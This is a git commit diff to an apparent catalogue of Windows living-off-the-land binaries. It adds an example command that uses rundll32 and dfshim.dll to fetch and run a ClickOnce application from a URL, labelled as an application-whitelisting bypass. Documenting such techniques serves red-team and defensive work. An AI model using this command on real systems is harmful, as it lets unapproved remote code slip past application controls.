Added example to DFSVC - Thanks to PolarBearGod

This commit is contained in:
Oddvar Moe 2018-12-10 18:45:41 +01:00
parent 7c1296f838
commit 1af009d707

View File

@ -4,8 +4,8 @@ Description: ClickOnce engine in Windows used by .NET
Author: 'Oddvar Moe' Author: 'Oddvar Moe'
Created: '2018-05-25' Created: '2018-05-25'
Commands: Commands:
- Command: Missing Example - Command: rundll32.exe dfshim.dll,ShOpenVerbApplication http://www.domain.com/application/?param1=foo
Description: Missing example Description: Executes click-once-application from Url
Usecase: Use binary to bypass Application whitelisting Usecase: Use binary to bypass Application whitelisting
Category: AWL bypass Category: AWL bypass
Privileges: User Privileges: User
@ -23,6 +23,7 @@ Detection:
- IOC: - IOC:
Resources: Resources:
- Link: https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf - Link: https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf
- Link: https://stackoverflow.com/questions/13312273/clickonce-runtime-dfsvc-exe
Acknowledgement: Acknowledgement:
- Person: Casey Smith - Person: Casey Smith
Handle: '@subtee' Handle: '@subtee'